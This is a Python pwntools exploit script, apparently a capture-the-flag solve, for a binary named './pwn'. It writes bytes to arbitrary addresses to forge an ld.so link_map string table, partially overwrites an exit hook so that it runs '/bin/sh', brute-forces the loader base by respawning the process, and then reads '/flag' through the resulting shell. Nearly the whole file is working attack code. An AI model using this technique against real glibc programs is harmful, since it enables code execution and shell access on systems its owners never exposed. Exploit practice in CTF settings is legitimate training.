#!/usr/bin/env python3
from pwn import *
# context.log_level = "debug"
# Thin pwntools shorthands. Every one of them looks up the module-level tube
# ``p`` at call time, so they keep working after the retry loop below rebinds
# ``p`` to a fresh process.
def p_addr(name, addr):
    """Print a labelled address in hex, e.g. ``base: 0x7f00``."""
    print(f"{name}: {hex(addr)}")


def ru(s):
    """Receive from ``p`` until ``s`` is seen; blocks without a timeout."""
    return p.recvuntil(s)


def rut(s, t):
    """Receive from ``p`` until ``s`` is seen, giving up after ``t`` seconds."""
    return p.recvuntil(s, timeout=t)


def r(n):
    """Receive up to ``n`` bytes from ``p``."""
    return p.recv(n)


def sla(d, b):
    """Wait for delimiter ``d`` on ``p``, then send ``b`` followed by a newline."""
    return p.sendlineafter(d, b)


def sa(d, b):
    """Wait for delimiter ``d`` on ``p``, then send ``b`` as-is."""
    return p.sendafter(d, b)


def sl(s):
    """Send ``s`` plus a newline to ``p``."""
    return p.sendline(s)


def sls(s):
    """Send ``str(s)`` (encoded) plus a newline to ``p``; handy for integers."""
    return p.sendline(str(s).encode())


def ss(s):
    """Send ``str(s)`` (encoded) to ``p`` without a newline."""
    return p.send(str(s).encode())


def s(s):
    """Send raw bytes ``s`` to ``p``."""
    return p.send(s)


def uu64(data):
    """Unpack up to 8 bytes as a u64 (pwntools default endianness), zero-padding short input."""
    return u64(data.ljust(8, b"\x00"))


def it():
    """Hand the tube ``p`` over to the user interactively."""
    return p.interactive()
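def write_one(addr, data):
    """Encode ``data`` as consecutive (address, byte) write records starting at ``addr``.

    Each record is an 8-byte address (``p64``, little-endian under the
    default pwntools context) followed by the single byte to store there
    (``p8``), so ``len(data)`` records are produced and byte ``i`` of ``data``
    lands at ``addr + i``. ``data`` must be ``bytes``-like (indexing yields
    ints); an empty ``data`` yields ``b""``.

    NOTE(review): the record layout presumably mirrors whatever write
    primitive ./pwn parses from its input -- confirm against the binary
    before changing it.
    """
    return b"".join(p64(addr + i) + p8(byte) for i, byte in enumerate(data))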
# NOTE(review): this handle is never used -- the retry loop below rebinds ``p``
# to a fresh process() before any helper touches it, so this spawn is leaked
# (it is only close()d if the very first process() inside the loop raises).
p = process("./pwn")
# io = remote("node4.buuoj.cn", 29129)
# Guessed ld.so load base. This is a fixed guess, not a leak: the retry loop
# below keeps respawning ./pwn until the guess matches the live process.
ld = 0x265000 - 0x10
# ld = 0x26b000 - 0x10   # value used against the remote target (kept for reference)

# Targets derived from the ld base. Judging by the names, this patches a
# struct link_map (with what is presumably its l_info[DT_STRTAB] slot at
# +0x68) and two slots the author calls the exit hook and its rdi argument.
# All of these offsets are specific to one glibc/ld.so build -- verify them
# against the target's ld.so before reusing the script.
link_base_addr = ld + 0x1190
link_dyn_str = link_base_addr + 0x68
fake_str = ld + 0x1160
exit_hook = ld + 0xF68
exit_hook_rdi = ld + 0x968
write_st_name = 62  # st_name offset inside the fake string table

# The payload is a flat sequence of (8-byte address, 1-byte value) records,
# in the order the target must apply them.
payload = b"".join([
    # single-byte patch at the start of the link_map
    p64(link_base_addr) + p8(0x18),
    # low 3 bytes of the exit-hook pointer (partial overwrite; remote: \x90\x72\xe2)
    write_one(exit_hook, b"\x90\x62\xb6"),
    # string the hook will receive in rdi
    write_one(exit_hook_rdi, b"/bin/sh\x00"),
    # "exit" planted at st_name offset 62 of the fake string table
    write_one(fake_str + write_st_name, b"exit\x00"),
    # last record: low-byte patch of the DT_STRTAB slot so lookups use the fake table
    p64(link_dyn_str) + p8(0xB8),
])
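count = 0  # failed attempts so far; the ld base above is a guess, so retry until it lands
while True:
    # Spawn outside the try: a failure here (missing or non-executable ./pwn)
    # is not fixed by retrying, so let it propagate instead of looping forever.
    p = process("./pwn")
    try:
        s(payload)
        # Probe for a shell: the echo reply only comes back if the overwrite
        # chain actually landed. Bounded wait so a child that hangs instead of
        # crashing cannot stall the brute-force loop indefinitely.
        sl(b"echo ok")
        if b"ok" not in rut(b"ok", 5):
            raise EOFError("no echo reply from child")
        sl(b"cat /flag")
        p.interactive()
        break
    except Exception as e:  # typically EOFError: child died on a bad base guess
        p.close()
        count += 1
        print(f"attempt {count} failed: {e!r}")
# Re-enter the interactive session once the first one returns (kept from the
# original control flow; on a closed tube this just reports EOF and returns).
it()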